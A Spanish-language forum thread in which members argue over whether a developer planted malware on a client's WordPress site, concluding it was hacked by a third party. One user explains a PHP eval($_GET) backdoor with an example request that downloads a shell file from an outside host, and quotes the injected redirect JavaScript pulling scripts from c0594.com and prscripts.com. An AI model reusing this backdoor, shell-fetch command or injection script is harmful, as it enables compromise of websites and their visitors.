Calificación negativa de tnc05

  • Autor Autor kanikase
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

la web esa a donde redireccionaba tu sitio tambien fue hackeada... es mas si miras el codigo fuente de la pagina tiene inyectado un JS para redireccionar y ese archivo que esta subido en la carpeta uploads no tiene que estar ahi.. por lo que fuiste hackeado... no tiene nada que ver kanikase...
 
[MENTION=28762]tnc05[/MENTION], Kanikase no es ni mi amigo ni mi hermano, jamas he hecho un negocio con el en el foro ni de ninguna manera, pero he visto sus negocios y hasta ahora, no he visto prueba definitiva en contra de el, solo sospechas, de hecho SoLuIts, en base a sus propias respuesta dejo ver que no se le puede señalar de forma indiscutible como el culpable.

Varios programadores del foro han dado respuesta también dejando ver que la negativa es injustificada.
 
Última edición:
Estoy de acuerdo con Raigor.

Al margen del problema de seguridad (que esperemos se aclare pronto), desde ya kanikase incumple con los tiempos estipulados.

El código tuvo que haber salido de algún lado, sea de la mano de kanikaze o sea de la mano de alguien más (recomiendo revisar desde el origen de los plugins hasta todas las personas que han tenido acceso a los sitios).

Otro detalle, es muy fácil decir "yo no fui" y llamar a todos mis clientes a defenderme.

Saludos cordiales.

Llamar a todos mis clientes? :distant::distant::distant::distant::distant::distant: bien, acepto que le platiqué a dos users lo sucedido, pero si comenta un user con el que he hecho negocio es porque lo llamé? :welcoming::welcoming::welcoming::witless:
 
Estoy de acuerdo con Raigor.

Al margen del problema de seguridad (que esperemos se aclare pronto), desde ya kanikase incumple con los tiempos estipulados.

El código tuvo que haber salido de algún lado, sea de la mano de kanikaze o sea de la mano de alguien más (recomiendo revisar desde el origen de los plugins hasta todas las personas que han tenido acceso a los sitios).

Otro detalle, es muy fácil decir "yo no fui" y llamar a todos mis clientes a defenderme.

Saludos cordiales.

o llamar a todos los amigos con los que tal vez me reunido a que afirmen que fue kanikase :encouragement:
 
Bueno espero que con lo que puso cicklow quede claro que no fui.

Y si no, como ya dije, puedo dar acceso a mis cuentas.

- - - Actualizado - - -

Otra cosa, el dominio ese fue renovado hace solo unos días, también puedo dar acceso a mis cuentas de PayPal, Payoneer, y cuentas bancarias para demostrar que tampoco he renovado dominios.
 
Bueno espero que con lo que puso cicklow quede claro que no fui.

Y si no, como ya dije, puedo dar acceso a mis cuentas.
Creo que no hay mas nada que hablar. Hablo cicklow

Enviado desde mi SGH-M919 mediante Tapatalk
 

Desde un principio la calificación estuvo mal colocada, pues no puede calificarte por "envirar" sus sitios web. 😕 O al menos debería demostrarlo con pruebas contundentes y no con suposiciones y con fragmentos de códigos.

Muy mal por su servidor que no guarda log's de conexión a panel y esas cosas normales.

Yo en lo particular no entendí muy bien tu mensaje [MENTION=9679]cicklow[/MENTION] si pudieras detallarlo mas para que quede 100% claro seria de gran ayudar.
 
Y otra prueba, el archivo ese del anuncio fue subido desde el año pasado, ¿desde entonces tenía pensado infectar tu web?
my-dairyman.com/wp-content/uploads/2015/10/image.html
 
En serio [MENTION=81006]kanikase[/MENTION] ? no lo puedo creer, en serio..................te llamas Camilo?
 
Amenos que tengas backup antes de que kanikase te hiciera el trabajo y así compararas cuando fueron modificados esos archivos, de otra manera sin pruebas no se podría acusar a [MENTION=81006]kanikase[/MENTION] que el modificó esos archivos por lo cual para mí no va esa negativa y debe ser retirada
 
Desde un principio la calificación estuvo mal colocada, pues no puede calificarte por "envirar" sus sitios web. 😕 O al menos debería demostrarlo con pruebas contundentes y no con suposiciones y con fragmentos de códigos.

Muy mal por su servidor que no guarda log's de conexión a panel y esas cosas normales.

Yo en lo particular no entendí muy bien tu mensaje [MENTION=9679]cicklow[/MENTION] si pudieras detallarlo mas para que quede 100% claro seria de gran ayudar.

el eval permite evaluar codigo PHP y ejecutarlo en el servidor...
PHP:
<?
eval($_GET['e']);
?>
si yo coloco eso en cualquier archivo PHP del servidor, puedo inyectarle cualquier codigo PHP que quiera y este se ejecutara en el servidor... ejemlo puedo hacer que lea un archivo remoto y lo cree en el servidor... ejemplo:
PHP:
www.sitio.com/archivoinfectado.php?e=file_put_contents('virus.php',file_get_contents('http://www.otrositio.com/shell.txt'));
y eso lo que hace es crear un archivo virus.php en el servidor infectado con el contenido de 404 Not Found y de esa forma basicamente estaria dentro del servidor con una shell o lo que sea... en mi ejemplo puse phpinfo(); (para que se ejecute) y esa funcion lo que hace es mostrarme la informacion de PHP...
El eval sin controlar es un peligro... es mas en muchos de los post por los cuales he participado por sitios hackeados/infectados les digo lo mismo, que busquen dentro de los archivos la cadena: eval, base64, etc... los cuales son comunes cuando infectan sitios...

No solo le infectaron el sitio lo mas seguro es que su sitio este siendo usado para redirecciones de otro sitio hackeado, como el caso del sitio a donde redireccionaba el sitio de tnc...
 
Llamar a todos mis clientes? :distant::distant::distant::distant::distant::distant: bien, acepto que le platiqué a dos users lo sucedido, pero si comenta un user con el que he hecho negocio es porque lo llamé? :welcoming::welcoming::welcoming::witless:
Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.

Te pasaste todo este tema intentando desvirtuarlo a más no poder y no es un detalle menor..
o llamar a todos los amigos con los que tal vez me reunido a que afirmen que fue kanikase :encouragement:
Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.
 
Y otra prueba, el archivo ese del anuncio fue subido desde el año pasado, ¿desde entonces tenía pensado infectar tu web?
my-dairyman.com/wp-content/uploads/2015/10/image.html
[MENTION=81006]kanikase[/MENTION] ... esa carpeta la crea WP por cada subida de archivos... por lo que esa carpeta ya fue creada y luego han hackeado el sitio y subido el archivo... lo hacen asi para que no se den cuenta de que fueron infectados... quien vaa buscar en la carpeta uploadas la cual hay solo imagenes un html... nadie...
Y ese archivo html fue modificado el:
Insertar CODE, HTML o PHP:
viernes, 10 de junio de 2016 02:31:09 p.m.

El que hackeo el sitio de tnc tmb ha hackeado varios sitios mas... y varios de las url que usa para infectar estan desde el 2014 reportados como virus...
 
Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.

Te pasaste todo este tema intentando desvirtuarlo a más no poder y no es un detalle menor..

Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.

Fueron 3 los users imparciales, los 3 se han reunido varias veces con este user (tnc) hay como 10 temas.

Y eso es lo que no me gustó, o a caso viste en alguno de mis comentarios que me molestara la respuesta de los demás usuario que opinaron?

http://forobeta.com/eventos/398383-7ma-juntada-argentina-de-forobeta-plata.html
 
Última edición:
Por qué hacerlo sino? Acá fueron pocos los que comentaron de manera imparcial.

Te pasaste todo este tema intentando desvirtuarlo a más no poder y no es un detalle menor..

Interesante postura ofensiva, doder10. No, no he trabajado con tnc05. Si lees atentamente, si bien estoy de su lado, también comento la posibilidad de que el hackeo tuviera otro origen.

nadie te dijo que conocieras o trabajaras con tnc05...si lees atentamente :encouragement:
 
Buscando errores de PHP de su sitio en google aparece una de las url que google cacheo la cual esta infectada con esto:
PHP:
<script type="text/javascript">	var _prvar=_prvar||new Object();	(function(pa,s){if(document.getElementById('pr48960776'))return false;	pa=document.createElement('script');pa.type='text/javascript';pa.async=true;pa.id='pr48960776';pa.src='//prscripts.com/pub.js';	s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(pa,s);})();document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://a.c'+'0594.com/?js=14"></'+'scr'+'ipt>');</script>
</head>
La cual AUN esas infectado, no has eliminado por completo el hackeo...

ese es el codigo que redirecciona a otro sitio... google muestra:
opt/php-7.0.3/lib/php') in /var/www/clients/client2/web2/web/wp-settings.php on ... Fatal error: Uncaught Error: Call to a member function register_handler() on ...

En todo tu sitio aun estan los codigos anteriores... si realmente lo limpiaste, pues te hackearon nuevamente... Yo no le veo continuar mas a esto, [MENTION=28762]tnc05[/MENTION] tu sitio fue hackeado, no infectado por kanikase....

PD: el dominio c0594.com el cual usan para redireccionar a otros lados esta reportada como virus y esta registrada desde el 2014...
 
Última edición:
nadie te dijo que conocieras o trabajaras con tnc05...si lees atentamente :encouragement:
Fue lo que insinuaste, mencioné lo del trabajo ya que esto es un foro-bolsa-de-trabajo, hace falta aclarar?
 
Última edición:
[MENTION=29029]SoLuIts[/MENTION] [MENTION=28762]tnc05[/MENTION] mas pruebas?
 
Cierto, cicklow ya dejó todo claro, ese es un dominio chino, el código que puso cicklow imprime otro JS (http://a.c0594.com/?js=14), y ese es el que redirecciona a a.c0594.com/?tz=14, luego es redirecciona a my-dairyman.com/wp-content/uploads/2015/10/image.html

Ya está todo claro, espero que me retiren la negativa. 🙂
 
Última edición:
Cierto, cicklow ya dejó todo claro, ese es un dominio chino, el código que puso cicklow imprime otro JS (http://a.c0594.com/?js=14), y ese es el que redirecciona a a.c0594.com/?tz=14, luego es redirecciona a my-dairyman.com/wp-content/uploads/2015/10/image.html

Ya está todo claro, espero que me retiren la negativa. 🙂

Lo peor es que aseguraron que tu hiciste eso y lo otro, entonces me imagino que el otro programador debiera dar un reembolso porque no hizo su trabajo o tal vez merece una negativa :welcoming:
 
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Atrás
Arriba